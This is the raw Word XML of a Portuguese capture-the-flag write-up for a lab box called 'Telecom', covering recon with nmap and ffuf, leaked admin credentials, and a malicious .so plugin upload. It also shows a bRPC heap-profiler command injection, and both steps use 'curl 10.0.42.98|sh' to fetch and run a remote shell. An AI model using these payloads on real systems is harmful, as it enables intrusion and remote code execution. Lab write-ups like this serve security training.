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u5boz8swe2m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vumuh65f2swn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Telecom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Caso precise de suporte, favor abrir um ticket no </w:t>
      </w:r>
      <w:hyperlink r:id="rId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9xz5t7c7swdi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Inicialmente foi feito um portscan utilizando o nmap para identificar todas as portas abertas no servidor alvo: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nmap -sC -sV --min-rate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-p- -Pn &lt;MACHINE-IP&gt;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30993"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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99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Analisando o output do scan podemos identificar apenas duas portas abertas, a 22 e 80.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08463"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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4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Acessando a aplicação na porta 80 logo somos redirecionado para o vhost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http://telecom.hc</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Para podermos acessar precisaremos adicionar esse vhost no nosso /etc/hosts com o seguinte comando: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"&lt;MACHINE-IP&gt; telecom.hc"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 sudo tee -a /etc/hosts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356"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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35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Feito isso agora temos acesso a página web. Após alguns testes identificamos que se trata de uma página estática sem nenhuma funcionalidade para explorar. Prosseguindo com o recon foi possível identificar um novo subdomínio utilizando a ferramenta ffuf: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ffuf -c -u http://telecom.hc/ -H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"Host: FUZZ.telecom.hc"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-w ~/wordlists/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -t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-fs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178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832"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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83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Após a conclusão do comando foi identificado um subdomínio chamado </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">telemetry</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Novamente foi adicionado no /etc/hosts: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"&lt;MACHINE-IP&gt; telemetry.telecom.hc"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 sudo tee -a /etc/hosts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11337"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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33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Após acessar a aplicação percebemos que há apenas uma página de login, não temos muita coisa a se fazer aqui sem credenciais. Sabendo disso então iniciamos um ffuzing nessa aplicação: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ffuf -c -u http://telemetry.telecom.hc/FUZZ -w ~/wordlists/SecLists/Discovery/Web-Content/api/api-endpoints.txt -t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Após finalizar o ffuzing encontramos um endpoint interessante chamado </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">api/config </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">como mostrado na imagem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32313"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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3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Acessando esse endpoint conseguimos encontrar as credenciais do painel de administração do usuário admin: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9512"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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51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60963"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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9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Após a autenticação, foi identificada a funcionalidade de </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Plugin Upload</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, responsável por carregar bibliotecas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.so</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> dinamicamente pelo módulo de telemetry.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 análise indicou que o mecanismo de upload permitia </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Arbitrary File Write (AFW)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. O arquivo enviado era gravado no servidor sem validação adequada de conteúdo ou restrição efetiva de carregamento.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Durante a pesquisa, foi utilizado como referência o artigo </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:hyperlink r:id="rId1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Python: Dirty Arbitrary File Write to RCE via Writing Shared Object Files or Overwriting Bytecode Files</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, que descreve a exploração de AFW para obtenção de execução remota de código através da escrita de bibliotecas compartilhadas maliciosas. </w:t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25400" l="25400" r="25400" t="2540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Ponto importante ressaltar é que quando for compilado o payload, a versão deve ser a mesma que está rodando na aplicação, no caso a versão 3.14 como mostrado na imagem.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 aplicação aceitava upload de plugins no formato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.so</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, que eram posteriormente utilizados pelo módulo de telemetry.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Foi criado um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telemetry.py</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> contendo execução de comando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os.system()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__import__(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).system(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'curl 10.0.42.98|sh'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 objetivo era forçar a execução do payload quando o módulo fosse inicializado pela aplicação.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Em seguida, o arquivo foi compilado para uma biblioteca compartilhada utilizando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cythonize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cythonize -i telemetry.py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Esse processo gerou o arquivo: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telemetry.cpython-311-x86_64-linux-gnu.so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Como a aplicação esperava um plugin no formato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telemetry.so</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, o arquivo gerado foi renomeado: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mv telemetry.cpython-311-x86_64-linux-gnu.so telemetry.so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 biblioteca resultante executa o payload no momento em que é carregada pelo mecanismo de plugins da aplicação.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025900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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71700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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Após o upload do </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">telemetry.so</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> através da funcionalidade vulnerável (AFW), o código </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">não foi executado imediatamente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  <w:t xml:space="preserve">Conforme descrito no artigo de referência, a execução ocorre quando o módulo é efetivamente carregado pela aplicação. No cenário analisado, isso acontecia ao acessar o endpoint responsável pelo telemetry.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  <w:t xml:space="preserve">Ao realizar a requisição para o endpoint </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/telemetry</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, o backend carregou o plugin recém-enviado, inicializando o módulo e executando o código malicioso e obtendo nossa reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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19100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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76300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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5hohgxvxcmgt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Durante a enumeração local, foi identificado um serviço escutando em </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1:8000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97100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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089400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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a enumeração local, além da interface de debug exposta em </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1:8000</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, encontrei uma PoC pública para </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2025-60021</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: uma vulnerabilidade de </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Command Injection</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> no endpoint de </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Heap Profiler</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> do Apache bRPC. Essa falha permite a injeção de comandos arbitrários no servidor porque o heap profiler aceita parâmetros que não são devidamente sanitizados antes de serem passados ao sistema.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Após algumas pesquisas de como explorar essa CVE, o seguinte payload foi utilizado:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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 -g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'http://localhost:8000/pprof/heap?display=text&amp;extra_options=inuse_space;curl${IFS}10.0.42.98|sh;'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467475" cy="3175238"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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31752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25" w:type="default"/>
      <w:headerReference r:id="rId26" w:type="first"/>
      <w:headerReference r:id="rId27" w:type="even"/>
      <w:footerReference r:id="rId28" w:type="default"/>
      <w:footerReference r:id="rId29" w:type="first"/>
      <w:footerReference r:id="rId30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rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_a3zjj8z6bxd1" w:id="4"/>
    <w:bookmarkEnd w:id="4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-866773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17" name="image12.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image12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A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-942972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-334960</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>5781358</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6667500" cy="2996629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</w:t>
                          </w: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Telecom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-334960</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>5781358</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6667500" cy="2996629"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="1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67500" cy="299662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8.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15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telecom.hc" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId27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yperlink" Target="https://discord.com/channels/705946302105649153/1173705871046475796" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId12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16.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://siunam321.github.io/research/python-dirty-arbitrary-file-write-to-rce-via-writing-shared-object-files-or-overwriting-bytecode-files/" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5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